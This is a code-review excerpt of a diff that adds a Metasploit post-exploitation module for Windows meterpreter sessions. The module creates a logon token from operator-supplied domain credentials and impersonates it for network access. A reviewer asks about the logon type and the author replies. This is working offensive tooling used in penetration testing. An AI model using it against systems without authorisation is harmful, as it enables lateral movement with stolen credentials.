modules/post/windows/manage/make_token.rb

```diff
@@ -0,0 +1,94 @@
+          a new logon session is created and linked to that token. The token is then impersonated to acquire 
+          the new network security context. This module has no effect on local actions - only on remote ones 
+          (where the specified credential material will be used). This module does not validate the credentials 
+          specified.
+        },
+        'License' => MSF_LICENSE,
+        'Notes' => {
+          'AKA' => ['make_token', 'maketoken']
+        },
+        'Platform' => ['win'],
+        'SessionTypes' => ['meterpreter'],
+        'Author' => [
+          'Daniel López Jiménez (attl4s)', 
+          'Simone Salucci (saim1z)'
+        ],
+        'Compat' => {
+          'Meterpreter' => {
+            'Commands' => %w[
+              stdapi_railgun_api
+              stdapi_sys_config_revert_to_self
+              stdapi_sys_config_update_token
+            ]
+          }
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('DOMAIN', [true, 'Domain to use' ]),
+        OptString.new('USER', [true, 'Username to use' ]),
+        OptString.new('PASSWORD', [true, 'Password to use' ])
+      ]
+    )
+
+    register_advanced_options(
+      [
+        OptString.new('LOGONTYPE', [true, 'The type of logon operation to perform. Using LOGON32_LOGON_INTERACTIVE may cause issues within the session (typically due to the token filtering done by the UserAccountControl mechanism in Windows). Use with caution', 'LOGON32_LOGON_NEW_CREDENTIALS'])
+      ]
+    )
+  end
+
+  def run
+    # Make sure we meet the requirements before running the script, note no need to return
+    # unless error
+    return unless session.type == 'meterpreter'
+
+    # check/set vars
+    user = datastore['USER']
+    password = datastore['PASSWORD']
+    domain = datastore['DOMAIN']
+    logontype = datastore['LOGONTYPE']
+
+    # revert any existing impersonation before doing a new one
+    print_status("Executing rev2self to revert any previous token impersonations")
+    session.sys.config.revert_to_self
+    
+    # create new logon session / token pair
+    print_status("Executing LogonUserA with the flag #{logontype} to create a new security context for #{domain}\\#{user}")
+    logon_user = session.railgun.advapi32.LogonUserA(user, domain, password, logontype, 'LOGON32_PROVIDER_DEFAULT', 4)
+
+    if logon_user['return']
+      # get the token handle
+      ph_token = logon_user['phToken']
+      print_status("Impersonating the new security context...")
+      
+      # store the token within the server
+      session.sys.config.update_token(ph_token)
+      print_good("The session should now run with the new security context!")
+      
+      # send warning 
+      if logontype == 'LOGON32_LOGON_NEW_CREDENTIALS'
+        print_warning("Remember that this will not have any effect on local actions (i.e. getuid will still show the original user)")
```

Comment:
Do you have any context you can provide as to why this is only the case for this particular logon type?

Reply:
I believe the `LOGON32_LOGON_NEW_CREDENTIALS` logontype is the only one that duplicates the original access token of the user, thus has no result on local actions. It only updates the logon session ID to a new logon session with the specified credentials for network access